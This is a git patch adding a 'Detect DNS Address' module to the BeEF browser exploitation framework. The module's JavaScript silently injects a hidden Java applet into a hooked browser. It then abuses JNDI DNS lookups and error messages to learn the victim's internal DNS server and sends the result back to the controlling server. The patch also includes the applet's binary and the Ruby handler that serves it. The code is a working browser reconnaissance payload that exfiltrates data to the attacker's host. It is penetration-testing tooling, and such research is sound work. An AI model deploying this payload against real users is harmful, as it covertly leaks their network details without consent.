From a0ba7fa7fc3b9ce5cdf7b11826eaab9331aee61e Mon Sep 17 00:00:00 2001
From: "bcoles@gmail.com"
 <bcoles@gmail.com@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Fri, 19 Aug 2011 06:33:21 +0000
Subject: [PATCH] Added module: Detect DNS Address

Fixes issue 141



git-svn-id: https://beef.googlecode.com/svn/trunk@1211 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 modules/network/detect_dns_address/command.js |  70 ++++++++++++++++++
 .../network/detect_dns_address/config.yaml    |  27 +++++++
 .../detect_dns_address/doNothing.class        | Bin 0 -> 240 bytes
 modules/network/detect_dns_address/module.rb  |  46 ++++++++++++
 4 files changed, 143 insertions(+)
 create mode 100644 modules/network/detect_dns_address/command.js
 create mode 100644 modules/network/detect_dns_address/config.yaml
 create mode 100644 modules/network/detect_dns_address/doNothing.class
 create mode 100644 modules/network/detect_dns_address/module.rb

diff --git a/modules/network/detect_dns_address/command.js b/modules/network/detect_dns_address/command.js
new file mode 100644
index 000000000..ab6c7849e
--- /dev/null
+++ b/modules/network/detect_dns_address/command.js
@@ -0,0 +1,70 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var command_timeout = "<%= @command_timeout %>";
+	var Packz = undefined;
+	var internal_counter = 0;
+
+	content = "<APPLET code='doNothing' codebase='http://"+beef.net.host+":"+beef.net.port+"/doNothing.class' width=0 height=0 id='beefdns' name='beefdns'></APPLET>";
+	$j('body').append(content);
+
+	function checkDns() {
+
+		var result = "";
+
+		try {
+			var env = new Packages.java.util.Hashtable();
+			env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory");
+			env.put("java.naming.provider.url", "dns://");
+			var ctx = new Packages.javax.naming.directory.InitialDirContext(env);
+			var attrs = ctx.getAttributes("localhost",['*']);
+		} catch(e) {
+			var d="";
+			if (typeof e != "string") d=e.message; else d=e.toString();
+			var re=new RegExp("java.net.SocketPermission.([^:]*)");
+			var g=re.exec(d);
+			result = g[1];
+		}
+
+		return(result);
+	}
+
+	function waituntilok() {
+
+		try {
+			var output = checkDns();
+
+			if (output != null) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "dns_address="+output);
+				$j('#beefdns').detach();
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+
+			internal_counter++;
+			if (internal_counter > command_timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=time out');
+				$j('#beefdns').detach();
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	waituntilok();
+
+});
diff --git a/modules/network/detect_dns_address/config.yaml b/modules/network/detect_dns_address/config.yaml
new file mode 100644
index 000000000..fa0c3aac4
--- /dev/null
+++ b/modules/network/detect_dns_address/config.yaml
@@ -0,0 +1,27 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        detect_dns_address:
+            enable: true
+            category: "Network"
+            name: "Detect DNS Address"
+            description: "Detects the client's DNS address using Java."
+            authors: ["bcoles"]
+            target:
+                working: "FF"
+                user_notify: "IE"
+                not_working: ["S", "O", "C"]
diff --git a/modules/network/detect_dns_address/doNothing.class b/modules/network/detect_dns_address/doNothing.class
new file mode 100644
index 0000000000000000000000000000000000000000..7e67f8fe82cbfd3587cfbe75b2fd7e3ccfdd48e0
GIT binary patch
literal 240
zcmZ9Gy9&ZU5Jm6gX=03EXJKKd76z<E5Wz~)DE5h2bR{MsB>tC`VBrV&QQ~Zh6mD_v
z?wP}|pYQ7pU;*ESj;;;QMvq`EWhSc?L7z;I1Y?sYg3#Z|Ooa6<7Udy|QznMe2<|?w
z%ahnj#rz}>^XekA^ZXj!BM$~lg40sMK=B|did0m=x+#pI@dwn=z<XhGTKpPu6Sp~g
bf*yP!*ql}aRd!l+*i6~@*Id>d9%^uZ1EVJ-

literal 0
HcmV?d00001

diff --git a/modules/network/detect_dns_address/module.rb b/modules/network/detect_dns_address/module.rb
new file mode 100644
index 000000000..d9f78c971
--- /dev/null
+++ b/modules/network/detect_dns_address/module.rb
@@ -0,0 +1,46 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# Uses the Packages.javax.naming package with DNS of "dns://"
+# Technique discovered by Stefano Di Paola from Minded Security Research Labs
+# Advisory: http://blog.mindedsecurity.com/2010/10/get-internal-network-information-with.html
+
+class Detect_dns_address < BeEF::Core::Command
+
+  def pre_send
+    # Mount the doNothing.class on /doNothing.class
+    # Unsure if there's something we can add here to check if the module was already mounted?
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_dns_address/doNothing.class','/doNothing','class')
+  end
+  
+  def self.options
+    return [
+        {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}
+    ]
+  end
+ 
+  def callback
+    content = {}
+    content['dns_address'] = @datastore['dns_address'] if not @datastore['dns_address'].nil?
+    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? 
+    content['fail'] = 'could not detect dns address' if content.empty?
+    save content
+
+    # Unmount the class now, it's no longer required.
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/doNothing.class');
+
+  end
+  
+end